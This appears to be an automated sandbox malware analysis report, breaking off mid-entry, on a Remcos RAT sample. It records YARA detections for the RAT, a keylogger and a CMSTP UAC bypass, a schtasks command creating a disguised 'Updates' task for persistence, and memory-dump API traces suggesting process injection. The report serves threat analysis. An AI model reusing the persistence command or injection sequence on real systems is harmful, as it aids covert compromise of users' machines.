                                              Start time:14:38:05
                                              Start date:17/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:7
                                              Start time:14:38:05
                                              Start date:17/12/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                              Imagebase:0x6b0000
                                              File size:262'432 bytes
                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4586156440.0000000000BA7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:false

                                              Target ID:8
                                              Start time:14:38:07
                                              Start date:17/12/2024
                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                              Imagebase:0x7ff717f30000
                                              File size:496'640 bytes
                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:9
                                              Start time:14:38:08
                                              Start date:17/12/2024
                                              Path:C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe
                                              Imagebase:0x9e0000
                                              File size:1'075'712 bytes
                                              MD5 hash:065A6053492ECC989755413D4B9CFFEA
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 39%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              Target ID:10
                                              Start time:14:38:09
                                              Start date:17/12/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp2A05.tmp"
                                              Imagebase:0xd50000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:11
                                              Start time:14:38:09
                                              Start date:17/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:12
                                              Start time:14:38:09
                                              Start date:17/12/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                              Imagebase:0xfb0000
                                              File size:262'432 bytes
                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2198970718.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                                Execution Graph

                                                Execution Coverage:11.7%
                                                Dynamic/Decrypted Code Coverage:96.1%
                                                Signature Coverage:10.3%
                                                Total number of Nodes:310
                                                Total number of Limit Nodes:13

                                                Control-flow Graph (graph image omitted)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2167842860.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2e80000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $ $ $ $ $ $ $ $&$&$&$&$&$4$4$6$;$;$;$U$U$p$p$p$p$p$q$q$u
                                                • API String ID: 0-587912492

                                                Control-flow Graph (graph image omitted)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ry$ry$ry
                                                • API String ID: 0-128149707

                                                Control-flow Graph (graph image omitted)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ry$ry$ry
                                                • API String ID: 0-128149707

                                                Control-flow Graph (graph image omitted)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TuA$UC;"
                                                • API String ID: 0-2071649361
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: z^I
                                                • API String ID: 0-307258731
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: z^I
                                                • API String ID: 0-307258731
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 5=6
                                                • API String ID: 0-2897083178
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 5=6
                                                • API String ID: 0-2897083178
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9fdc1cbdb17593e09c3795a99063318be0cb82245253f3d7882bdada0c96723a
                                                • Instruction ID: e199a006b0fc8b4de751c74146e16ae189e7adc26a814a58760960b35e6968b0
                                                • Opcode Fuzzy Hash: 9fdc1cbdb17593e09c3795a99063318be0cb82245253f3d7882bdada0c96723a
                                                • Instruction Fuzzy Hash: DC32AF70E10255DFDB18EFA9C8547AEBBF2AFC8300F14846AD449AB385DB349D81CB95
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2166981085.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d50000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 00343cf76cad84354132617d9163dd27495b40dbd2df2e634397694d9c865683
                                                • Instruction ID: b4a78f0a30b904c937bac53f8cfc9d38e1b7c60ae1581e82a066a807f3c9b629
                                                • Opcode Fuzzy Hash: 00343cf76cad84354132617d9163dd27495b40dbd2df2e634397694d9c865683
                                                • Instruction Fuzzy Hash: F522BA30B012148FDB19DB7AC550BAEB7F6AF89704F2480AEE9469B3A1CB70DD05CB51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 343fed34af2ceb62a12a2e61b02ee9b3cf992100e00cdcbb54484dc4318b9eed
                                                • Instruction ID: d8ad48e29eb23b64c58117e2000ae5cd2025b6d43dcdcd45772dcabb3384d921
                                                • Opcode Fuzzy Hash: 343fed34af2ceb62a12a2e61b02ee9b3cf992100e00cdcbb54484dc4318b9eed
                                                • Instruction Fuzzy Hash: 5EB17F72E001198FD704DBA9C845ADEFBF2AFC8210F19867AD458EB395DA30DD52CB91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 34807a93ca8fcc7b55809fb532e195ff28803ada5261fc58cbbf2662e529faeb
                                                • Instruction ID: 574fd063f2ecab70d8d579c6dc5b53e71aa900e491fe8f52d0878da50a9d2827
                                                • Opcode Fuzzy Hash: 34807a93ca8fcc7b55809fb532e195ff28803ada5261fc58cbbf2662e529faeb
                                                • Instruction Fuzzy Hash: 7FC18FB0D10295DFDB14EFA5C88479DBBF2AF89300F14C56AD489AB255EB30DA85CF90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b453f46d78be7a361e6489cbbe8e755271c775b16c55e48ccc1fb1495b4f3119
                                                • Instruction ID: bd0672e7bacf1bbceda6134aeee85ee7c7b58f11677850d155a9ffd192552392
                                                • Opcode Fuzzy Hash: b453f46d78be7a361e6489cbbe8e755271c775b16c55e48ccc1fb1495b4f3119
                                                • Instruction Fuzzy Hash: BDB109B1D15249DFCB28CFEAD5806EEFBB6BF89304F20942AD115AB255D7349A06CF10
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2166981085.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d50000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: adbd481185abd39ff58bbf0a83632acd555a33e010d5b6fce9532976924a8cfe
                                                • Instruction ID: 8c6932c6f66dd773553f8bd0d980956225684b1f3a78e408a938be0de264a0ca
                                                • Opcode Fuzzy Hash: adbd481185abd39ff58bbf0a83632acd555a33e010d5b6fce9532976924a8cfe
                                                • Instruction Fuzzy Hash: 5F611C71D05629CBEB28CF66C8447EDB7B6BF89301F14D1EAD84DA6250EBB05A85CF40
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3c3a2f66b3485bc186e8b6cae37f00c168c77f1985bd3897beff8155fd5f71b3
                                                • Instruction ID: 5cba3c822b6acfe5812f3bfe446af7ac18de7c92077719e9a6e950de28b71b0b
                                                • Opcode Fuzzy Hash: 3c3a2f66b3485bc186e8b6cae37f00c168c77f1985bd3897beff8155fd5f71b3
                                                • Instruction Fuzzy Hash: C8317EB1D15219CFDB28CFAAD8447EEBBB6AFCA300F04C46AC509A6255DB341946CF60
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4efcf19242c537f374f11e6ee0c41a9ce2b76ae9a8ce87fab88fbe415ddcf50e
                                                • Instruction ID: afbc1acd7bf7d19cdc384eeb7efb0e4a83e75379777aa3a478873dda6115e394
                                                • Opcode Fuzzy Hash: 4efcf19242c537f374f11e6ee0c41a9ce2b76ae9a8ce87fab88fbe415ddcf50e
                                                • Instruction Fuzzy Hash: 15316DB1E106588FDB18CF96D8486DEBBB7AFC9310F14C06AD409AA224DB755A86CF50

                                                Control-flow Graph: function starting at 74bee70, calls CreateProcessA (rendered as a graph image in the report; node/edge list omitted)
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 074BF0A6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: e121c64066e7aeb6db64cb9cdce7f5cafc974f1e079df238015075b9af627221
                                                • Instruction ID: 94c5a7abf44cc3d5528d5860ea7bfe9bf79acbe68169ca9de9e74caae6012eee
                                                • Opcode Fuzzy Hash: e121c64066e7aeb6db64cb9cdce7f5cafc974f1e079df238015075b9af627221
                                                • Instruction Fuzzy Hash: 8B912BB1D0026ADFDB24DF69CD417DEBBB2AF88310F14856AE808A7250D7749D85CFA1

                                                Control-flow Graph: function starting at 140ad68, calls GetModuleHandleW (rendered as a graph image in the report; node/edge list omitted)
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0140AFBE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2165291226.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1400000_file.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: b644105e316edb754b4acfe238b4b7335ecbdf4c3cf2a05aa49edc171c6bce8a
                                                • Instruction ID: a76b087594de3a5f9f948604dffb38ac48454d98a589c249321029b43cfa0145
                                                • Opcode Fuzzy Hash: b644105e316edb754b4acfe238b4b7335ecbdf4c3cf2a05aa49edc171c6bce8a
                                                • Instruction Fuzzy Hash: DA8147B0A00B058FD725DF2AD04075ABBF1FF88314F108A2ED54A97B91D775E84ACB95

                                                Control-flow Graph: function starting at 14058ed, calls CreateActCtxA (rendered as a graph image in the report; node/edge list omitted)
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 014059A9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2165291226.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1400000_file.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 3a486d971f7d133ef2884a26744eb1239d57ed2f586f1dc563e052cd5b8aa5bc
                                                • Instruction ID: 2f539fd8a466f13bb2d8b465602f41cc2a452d898119ffeb7cb595966de5f46c
                                                • Opcode Fuzzy Hash: 3a486d971f7d133ef2884a26744eb1239d57ed2f586f1dc563e052cd5b8aa5bc
                                                • Instruction Fuzzy Hash: 6051F171C00719CBEB25CFAAC8447DEBBF5BF88314F20806AD518AB251D7756945CF91

                                                Control-flow Graph: function starting at 2e818e4, calls CreateWindowExW (rendered as a graph image in the report; node/edge list omitted)
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02E81A02
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2167842860.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2e80000_file.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: e790910ee3ecfa4d21d67344086605ed7913c8301bc8f4c3496c4f6959a45f6b
                                                • Instruction ID: 5a848a1cf341aa13743da769706ad8d316b8a5b7a02723ef06aa365e67717600
                                                • Opcode Fuzzy Hash: e790910ee3ecfa4d21d67344086605ed7913c8301bc8f4c3496c4f6959a45f6b
                                                • Instruction Fuzzy Hash: 1051FFB1C00349DFDF14CF99C984ADEBBB5BF48314F24916AE819AB210D7749886CF90

                                                Control-flow Graph: function starting at 2e818f0, calls CreateWindowExW (rendered as a graph image in the report; node/edge list omitted)
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02E81A02
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2167842860.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2e80000_file.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: ae0250647ecc12c85220056f3bae4652daed6bbd4c566e24d54a188492b6a0c5
                                                • Instruction ID: a2960662602e8c33bc0d3694ea2303a33cc8f6a2b686d06c97ce3e253f66659c
                                                • Opcode Fuzzy Hash: ae0250647ecc12c85220056f3bae4652daed6bbd4c566e24d54a188492b6a0c5
                                                • Instruction Fuzzy Hash: B141CFB1D00349DFDF14CF9AC984ADEBBB5BF48314F24916AE819AB210D774A985CF90

                                                Control-flow Graph: function starting at 14044b0, calls CreateActCtxA (rendered as a graph image in the report; node/edge list omitted)
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 014059A9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2165291226.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1400000_file.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 9fb98d00011e4aa9ca2dec9e338d7c4cd6b2afc87d06890ccecbe3f4173e684e
                                                • Instruction ID: 050203f91040c85cafce8b03815801e1c3a5b33af975aa3076f03c94bfb7166b
                                                • Opcode Fuzzy Hash: 9fb98d00011e4aa9ca2dec9e338d7c4cd6b2afc87d06890ccecbe3f4173e684e
                                                • Instruction Fuzzy Hash: 8541F370C0071DCBEB25CFAAC94478EBBB5FF88304F20806AD518AB251DB756946CF91

                                                Control-flow Graph: function starting at 2e84040, calls CallWindowProcW (rendered as a graph image in the report; node/edge list omitted)
                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 02E84101
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2167842860.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2e80000_file.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: 5285a968939fd1813959d0ce6025ac3d6984f20936094bb6c25ee63a4afbb0e7
                                                • Instruction ID: 8389dd0902673dbc47898f1a49911504f440e116cf7988802eb465c741814d7d
                                                • Opcode Fuzzy Hash: 5285a968939fd1813959d0ce6025ac3d6984f20936094bb6c25ee63a4afbb0e7
                                                • Instruction Fuzzy Hash: 494117B5A0030ACFCB14DF99C448AAABBF5FF88314F24C499D559AB361D775A841CFA0

                                                Control-flow Graph: function starting at 72650d0, calls CreateIconFromResourceEx (rendered as a graph image in the report; node/edge list omitted)
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID: CreateFromIconResource
                                                • String ID:
                                                • API String ID: 3668623891-0
                                                • Opcode ID: eb26accc32d3ea705c011dbf4d3e93fae9808becd3b9dcde8558a35e1f6900fd
                                                • Instruction ID: 3c61d549ca4b2053230c955f8ba04ddcf80bc34ad318665b87c5e064be22acfc
                                                • Opcode Fuzzy Hash: eb26accc32d3ea705c011dbf4d3e93fae9808becd3b9dcde8558a35e1f6900fd
                                                • Instruction Fuzzy Hash: 2D317AB2914359DFCB11CFAAC844AAEBFF8EF09310F14845AE558A7221C335D854CFA1

                                                Control-flow Graph: function starting at 7263fd1, calls DrawTextExW (rendered as a graph image in the report; node/edge list omitted)
                                                APIs
                                                • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0726406F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID: DrawText
                                                • String ID:
                                                • API String ID: 2175133113-0
                                                • Opcode ID: a19c39bf766a6dfb4e7bfb3703065b4d816aa6b835a9505b75560e774c36eb28
                                                • Instruction ID: c3f81ee3f3ec06f5b0e5ce57679ceffd88f53b390b5a3c931045ed631aea4e44
                                                • Opcode Fuzzy Hash: a19c39bf766a6dfb4e7bfb3703065b4d816aa6b835a9505b75560e774c36eb28
                                                • Instruction Fuzzy Hash: 6921F4B5D1025A9FDB14DF9AD984A9EFBF5FF48310F14842AE819A7310D374A644CFA0

                                                Control-flow Graph: function starting at 7263fd8, calls DrawTextExW (rendered as a graph image in the report; node/edge list omitted)
                                                APIs
                                                • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0726406F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID: DrawText
                                                • String ID:
                                                • API String ID: 2175133113-0
                                                • Opcode ID: 7135bd1ac38fba90c371dee6832eb3598f1cf21f7fef774d107b8357b5d78c79
                                                • Instruction ID: 748046c646ee8d6e231f41ef699ce3266f0e2a0be1d6f45396153efaf7edfe92
                                                • Opcode Fuzzy Hash: 7135bd1ac38fba90c371dee6832eb3598f1cf21f7fef774d107b8357b5d78c79
                                                • Instruction Fuzzy Hash: F021E2B590024A9FDB10DF9AD884A9EBBF5FB48320F14842AE919A7310D775A540CFA0

                                                Control-flow Graph: function starting at 74bebe8, calls WriteProcessMemory (rendered as a graph image in the report; node/edge list omitted)
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 074BEC78
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 9857937f55916206866b08bc26cf6f52ebe72c0270c355342eca9c5aac05aa31
                                                • Instruction ID: 5cc0d1dd595728a9ca51dffa21d534818db74e3e46aba191565f5abb7c050c78
                                                • Opcode Fuzzy Hash: 9857937f55916206866b08bc26cf6f52ebe72c0270c355342eca9c5aac05aa31
                                                • Instruction Fuzzy Hash: 2E2126B19003599FDB10CFA9C981BDEBBF5FF88310F14842AE918A7240D7789950CBA5
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0140D616,?,?,?,?,?), ref: 0140D6D7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2165291226.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1400000_file.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 37953e7359e964af20200f5cef33f6ab22667d3cb842c73259749474bf8337e1
                                                • Instruction ID: 5408fe1c1c7409623c32e50520730114e898d09c235c835c459c1866369701cd
                                                • Opcode Fuzzy Hash: 37953e7359e964af20200f5cef33f6ab22667d3cb842c73259749474bf8337e1
                                                • Instruction Fuzzy Hash: BF2105B5D00209DFDB10CF9AD984ADEBBF4FB48310F14842AE918A3350C378A944CFA5
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0140D616,?,?,?,?,?), ref: 0140D6D7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2165291226.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1400000_file.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: fdfe16536110f650a9009feb95fdfcedf5c2da3661e55a1266570ef8a2253802
                                                • Instruction ID: f6b162cbea564c120e9b33d58b77d6f57eda9d0834f7a438f21501593436603f
                                                • Opcode Fuzzy Hash: fdfe16536110f650a9009feb95fdfcedf5c2da3661e55a1266570ef8a2253802
                                                • Instruction Fuzzy Hash: 6621E5B5D00249DFDB10CF9AD984ADEBBF4EB48320F14845AE918A7350D378A954CFA5
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074BE696
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 5eb1b80d4afb9a61dbd99c056226d61a5b526c1f705b8488b524733e04caefa2
                                                • Instruction ID: 817aebdabca74fa117f53f0e13a8addeb38b7ba2b64e115ce0e3eebc791e9eff
